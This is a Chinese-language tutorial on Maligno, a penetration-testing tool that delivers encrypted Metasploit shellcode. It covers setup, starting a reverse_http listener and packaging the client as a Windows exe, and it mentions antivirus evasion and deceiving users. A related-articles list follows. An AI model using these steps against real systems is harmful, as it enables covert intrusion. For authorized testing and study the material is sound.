Maligno 一個開源的滲透測試工具

今天我想介紹一個能夠在滲透測設(shè)中幫到你的工具。Maligno是一個基于FreeBSD許可證的開源的滲透測試工具。使用Python編寫,最大限度與Metasploit兼容。
它利用Metasploit framework框架,尤其是msfvenom,來生成AES加密的shellcode,并且在傳輸前會編碼。
Maligno是非常有用的工具。它是為滲透測試設(shè)計(jì)的,但是也可以用于其它不同的場景。Maligno的通信非常靈活,可以讓它仿真惡意軟件的行為或通信模式。
Maligno的架構(gòu)由客戶端和服務(wù)端組成。Maligno各部分使用HTTP和HTTPS協(xié)議通信。
客戶端和服務(wù)端可以配置成模擬特定的C&C通信,或者用作對手復(fù)制的一個部分(adversary replication,對手復(fù)制是滲透測試中的一個新概念,指用工具模擬黑客攻擊,檢查安全機(jī)制的有效性)。
客戶端可以連接Maligno,下載加密的Metasploit載荷。當(dāng)shellcode被下載下來,客戶端解碼和解密之后將其注入到目標(biāo)機(jī)中。
客戶端是David Kennedy的PyInjector的擴(kuò)展版本。它支持各種操作系統(tǒng),比如:Linux,Windows,以及OS X。Maligno已經(jīng)具備了你需要的任何客戶端和任何載荷。它有一個混淆器可在生成代碼時混亂它。
Malingno另一個好功能是載荷延遲執(zhí)行,規(guī)避殺軟的啟發(fā)式掃描。
服務(wù)端部分基于Metasploit來工作,事實(shí)上,它能夠用msfvenom動態(tài)生成針對各種類型目標(biāo)的載荷。它也支持多載荷和多連接。多虧Metasploit的輔助模塊,它支持Socks5a代理。
如果你想在特定的IP和網(wǎng)絡(luò)散布載荷,Maligno支持scopes。如果一個請求不在配置文件中的任何一個scops中,你可以配置“Last Resort Redirection”,這樣就能禁止把載荷傳送到不在scope范圍內(nèi)的目標(biāo)上。
安裝
安裝非常簡單,你可以直接在這里下載
解壓文件,然后執(zhí)行安裝腳本。
# ./install.sh
它會詢問你創(chuàng)建用于SSL模式操作的證書的相關(guān)問題。
配置
在安裝完成后,你可以修改服務(wù)端的配置文件,打開它,修改使用你的載荷和IP。
這里有一個配置文件的完整解釋:
# cat docs/server_config.explained
創(chuàng)建客戶端腳本
# ./clientgen.py -f youconfifileserver.xml -s true

這個命令為你在youconfifileserver.xml文件中配置的每個載荷生成一個Python腳本。
開啟Malingo服務(wù)端
# ./maligno_srv.py

Metasploit listener
現(xiàn)在,我們進(jìn)入到Maligno文件夾里的msfresources文件夾中,執(zhí)行Metasploit listener。Maligno為了快速加載,替我們?yōu)槊總€載荷創(chuàng)建了一個簡單的腳本。
# cd msfresources
# msfconsole -r 0_standard_reverse_http_192.168.226.139_4444.rc
現(xiàn)在我們把Maligno環(huán)境加載并運(yùn)行起來了。
在真實(shí)場景中,我們無法欺騙用戶,勸他安裝運(yùn)行Python腳本所需環(huán)境。我們不得不把Python腳本轉(zhuǎn)換為exe。
Python腳本轉(zhuǎn)為exe
在完成Maligno Python腳本創(chuàng)建后,為了適用于各中環(huán)境,我們不得不轉(zhuǎn)化它。
我們需要下面的軟件:
Python 2.7 32bit for windows
Pyinstaller 2.1
PyWin32 32bit
VM Windows 7 32/64
在自己的Windows機(jī)器上安裝Python2.7。從官網(wǎng)下載并安裝它。
接下來,打開一個CMD shell,進(jìn)入C:\Python27\里的scripts目錄。
C:\Python27\Scripts\pip.exe install pyinstaller
或者,如果你在Windows的環(huán)境變量中安裝了Python的路徑。
C:\pip.exe install pyinstaller
下載最新版本的Pyinstaller,下載后會自動安裝。
現(xiàn)在該安裝PyWin32了。在這之前,如果你選擇msi installer,你只需點(diǎn)擊netx直到結(jié)束。默認(rèn)配置是正確的,它會從windows的環(huán)境變量中找到Python的安裝路徑。
為了在下載階段能夠解密載荷,安裝crypto模塊很重要。
C:\easy_install.exe crypto
C:\easy_install.exe pycrypto
現(xiàn)在我們準(zhǔn)備利用Python腳本創(chuàng)建我們的exe
打開Linux攻擊機(jī)(我們在那里創(chuàng)建了Maligno服務(wù)端),然后選擇一個腳本,拷貝并粘貼到Windwos虛擬機(jī)中你指定的文件夾。
進(jìn)入那個文件夾,并執(zhí)行pyinstaller
C:\pyinstaller.exe -F -w --onefile 0_standard_reverse_http.py
如果沒有錯誤,pyinstaller創(chuàng)建一個名為dist的文件夾,到里面我們就能找到.exe文件,可以使用它測試你的載荷。
資源:
Malingo v2.2由Encripto發(fā)布,可以在下面的地址中免費(fèi)下載。
https://www.encripto.no/nb/downloads/tools/
https://www.encripto.no
* 翻譯自resources.infosecinstitute,轉(zhuǎn)載請注明來自FreeBuf黑客與極客(FreeBuf.COM)
相關(guān)文章
SQLMap簡介及簡單應(yīng)用實(shí)例圖文詳解
一個自動化的SQL注入工具,其主要功能是掃描、發(fā)現(xiàn)并利用給定URL的SQL注入漏洞,內(nèi)置了很多繞過插件,支持的數(shù)據(jù)庫是MySQL 、Oracle 、PostgreSQL 、Microsoft SQL Server2023-02-04- Nmap是一款網(wǎng)絡(luò)掃描和主機(jī)檢測的非常有用的工具。Nmap是不局限于僅僅收集信息和枚舉,同時可以用來作為一個漏洞探測器或安全掃描器。它可以適用于winodws,linux,mac等操作2019-03-16
SQLMAP注入檢查方法 11種常見SQLMAP使用方法詳解
sqlmap也是滲透中常用的一個注入工具,其實(shí)在注入工具方面,很多人都是通過這個工具實(shí)施的檢測與注入,對于我們從事安全防御的人來說,一定要引起注意,一般的程序員寫的代2018-08-16- 這篇文章主要介紹了lcx用法之心得總結(jié),需要的朋友可以參考下2017-09-06
lcx端口轉(zhuǎn)發(fā)詳細(xì)介紹及使用方法(lcx內(nèi)網(wǎng)轉(zhuǎn)發(fā)姿勢)
這篇文章主要介紹了lcx端口轉(zhuǎn)發(fā)詳細(xì)介紹及使用方法(lcx內(nèi)網(wǎng)轉(zhuǎn)發(fā)姿勢),需要的朋友可以參考下2017-09-06- 這是我們的Nmap備忘單的第四部分,本文中我們將討論更多東西關(guān)于掃描防火墻,IDS / IPS 逃逸,Web服務(wù)器滲透測試等。在此之前,我們應(yīng)該了解一下防火墻的一些基礎(chǔ)知識以便2016-12-27
- 眾所周知NMAP是經(jīng)常用來進(jìn)行端口發(fā)現(xiàn)、端口識別。除此之外我們還可以通過NMAP的NSE腳本做很多事情,比如郵件指紋識別,檢索WHOIS記錄,使用UDP服務(wù)等2016-12-27
- 這是我們的第二期NMAP備忘單,基本上,我們將討論一些高級NMAP掃描的技術(shù),我們將進(jìn)行一個中間人攻擊(MITM)。現(xiàn)在,游戲開始了2016-12-27
- nmap是一個網(wǎng)絡(luò)連接端掃描軟件,用來掃描網(wǎng)上電腦開放的網(wǎng)絡(luò)連接端。確定哪些服務(wù)運(yùn)行在哪些連接端,并且推斷計(jì)算機(jī)運(yùn)行哪個操作系統(tǒng)(這是亦稱 fingerprinting)。它是網(wǎng)2016-12-27
網(wǎng)絡(luò)漏洞掃描工具Acunetix Web Vulnerability Scanner(AWVS)使用介紹
Acunetix Web Vulnerability Scanner(簡稱AWVS)是一款知名的網(wǎng)絡(luò)漏洞掃描工具,它通過網(wǎng)絡(luò)爬蟲測試你的網(wǎng)站安全,檢測流行安全漏洞。倫敦時間2015年6月24日,官方發(fā)布了2016-09-28